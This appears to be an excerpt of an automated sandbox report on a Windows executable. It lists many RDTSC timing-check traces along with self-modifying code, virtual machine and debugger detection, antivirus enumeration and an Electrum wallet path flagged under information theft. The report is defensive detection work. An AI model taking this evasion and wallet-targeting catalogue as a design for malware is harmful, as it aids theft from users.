                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C4D7DD second address: C4D7E8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C4DA57 second address: C4DA7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DD4F83h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnl 00007FC064DD4F7Ah 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C4C99B second address: C4C99F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C546DE second address: C546E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C546E3 second address: C546F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C546F5 second address: C546FB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C5427D second address: C54282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C664B2 second address: C664B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C664B6 second address: C664BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C664BA second address: C664DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC064DD4F7Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007FC064DD4F82h 0x00000011 jns 00007FC064DD4F76h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C666B3 second address: C666BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C666BB second address: C666BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C68247 second address: C6826E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DA37BFh 0x00000007 jng 00007FC064DA37B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC064DA37BCh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C6826E second address: C68272 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C68272 second address: C68283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C6CE91 second address: C6CE97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C6CE97 second address: C6CE9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: B8795C second address: B87990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC064DD4F76h 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jmp 00007FC064DD4F80h 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 je 00007FC064DD4F7Eh 0x0000001a jno 00007FC064DD4F76h 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: B87990 second address: B87994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: B87994 second address: B879AA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007FC064DD4F7Eh 0x0000000e jo 00007FC064DD4F76h 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: B879AA second address: B879B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C7605C second address: C76075 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC064DD4F82h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C7BB2E second address: C7BB34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C7D11D second address: C7D121 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C7D121 second address: C7D127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C828FF second address: C82903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C82903 second address: C82907 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C82907 second address: C8290D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C8290D second address: C82916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C82D02 second address: C82D24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007FC064DD4F81h 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C82D24 second address: C82D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C82D29 second address: C82D33 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC064DD4F7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C86953 second address: C86971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC064DA37C3h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C86971 second address: C86987 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DD4F7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C89E56 second address: C89E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C972D1 second address: C972D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C972D5 second address: C972EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007FC064DA37B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007FC064DA37BEh 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: C942EC second address: C942F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: CA6CD5 second address: CA6CF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DA37C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: CA6CF5 second address: CA6CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: CA6CFB second address: CA6D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 jc 00007FC064DA37E7h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC064DA37C6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: CA6D21 second address: CA6D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: CBBB7C second address: CBBB81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: CBBB81 second address: CBBB8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FC064DD4F76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: CBBB8B second address: CBBB8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: CBA9DA second address: CBA9DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: CBB5C3 second address: CBB5C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: CBB5C9 second address: CBB5CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: CBB5CD second address: CBB5DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jg 00007FC064DA37B6h 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: CBB5DD second address: CBB5ED instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: CBB5ED second address: CBB60D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FC064DA37C8h 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: CBB7E4 second address: CBB7E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: CBB7E8 second address: CBB7EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: CBB7EE second address: CBB7FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jl 00007FC064DD4FC1h 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: CBE799 second address: CBE7BC instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC064DA37B8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jo 00007FC064DA37DFh 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC064DA37BDh 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: CBFD0F second address: CBFD19 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: CBFD19 second address: CBFD29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DA37BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: CBFD29 second address: CBFD6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DD4F88h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC064DD4F80h 0x00000010 pushad 0x00000011 jns 00007FC064DD4F76h 0x00000017 jmp 00007FC064DD4F7Bh 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: CC17AE second address: CC17BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: CC17BA second address: CC17C6 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC064DD4F76h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: CC37B3 second address: CC37E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC064DA37B6h 0x0000000a jmp 00007FC064DA37C8h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 popad 0x00000013 jc 00007FC064DA37B6h 0x00000019 pop eax 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: CC37E0 second address: CC37EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FC064DD4F76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: CC37EA second address: CC37F0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BD0F9A second address: BD0F9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: BD0F9E second address: BD0FA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: 4DD0863 second address: 4DD0869 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: 4DD0869 second address: 4DD08CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FC064DA37C6h 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FC064DA37C0h 0x00000014 mov ebp, esp 0x00000016 jmp 00007FC064DA37C0h 0x0000001b xchg eax, ecx 0x0000001c jmp 00007FC064DA37C0h 0x00000021 push eax 0x00000022 jmp 00007FC064DA37BBh 0x00000027 xchg eax, ecx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: 4DD08CF second address: 4DD08D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: 4DD08D3 second address: 4DD08D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: 4DD08D9 second address: 4DD0913 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC064DD4F88h 0x00000008 pop ecx 0x00000009 mov cx, dx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007FC064DD4F7Fh 0x00000018 mov cx, 32DFh 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: 4DD0913 second address: 4DD0919 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: 4DD0919 second address: 4DD091D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: 4DD091D second address: 4DD0955 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b jmp 00007FC064DA37C3h 0x00000010 lea eax, dword ptr [ebp-04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC064DA37C5h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: 4DD0955 second address: 4DD097A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DD4F81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC064DD4F7Dh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\JqGBbm7.exeRDTSC instruction interceptor: First address: 4DD097A second address: 4DD0980 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe | Special instruction interceptor: First address: A26C5D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\JqGBbm7.exe | Special instruction interceptor: First address: BEEDE8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\JqGBbm7.exe | Special instruction interceptor: First address: A26B5F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\JqGBbm7.exe | Special instruction interceptor: First address: BD7659 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\JqGBbm7.exe | Special instruction interceptor: First address: C5A46D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\JqGBbm7.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\JqGBbm7.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\JqGBbm7.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 0_2_00A2C130 rdtsc 0_2_00A2C130
Source: C:\Users\user\Desktop\JqGBbm7.exe TID: 7404 | Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\Desktop\JqGBbm7.exe TID: 7408 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\JqGBbm7.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: JqGBbm7.exe, JqGBbm7.exe, 00000000.00000002.1807079668.0000000000BA5000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: JqGBbm7.exe, 00000000.00000003.1796984446.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000002.1808013073.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1759629623.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1699679879.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1806416714.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1711208127.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1775186132.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1770818531.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: JqGBbm7.exe, 00000000.00000002.1807884478.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1806416714.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWx*
Source: JqGBbm7.exe, 00000000.00000002.1807079668.0000000000BA5000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\JqGBbm7.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\JqGBbm7.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\JqGBbm7.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\JqGBbm7.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\JqGBbm7.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\JqGBbm7.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\JqGBbm7.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\JqGBbm7.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\JqGBbm7.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\JqGBbm7.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\JqGBbm7.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: NTICE
Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: SICE
Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\JqGBbm7.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\JqGBbm7.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\JqGBbm7.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 0_2_00A2C130 rdtsc 0_2_00A2C130
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 0_2_00A0BCE0 LdrInitializeThunk,0_2_00A0BCE0
Source: JqGBbm7.exe, JqGBbm7.exe, 00000000.00000002.1807219700.0000000000BEB000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: /Program Manager
Source: C:\Users\user\Desktop\JqGBbm7.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\JqGBbm7.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: JqGBbm7.exe, 00000000.00000003.1775186132.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\JqGBbm7.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match | File source: Process Memory Space: JqGBbm7.exe PID: 7280, type: MEMORYSTR
                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                Source: JqGBbm7.exe, 00000000.00000003.1759629623.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Electrum\wallets
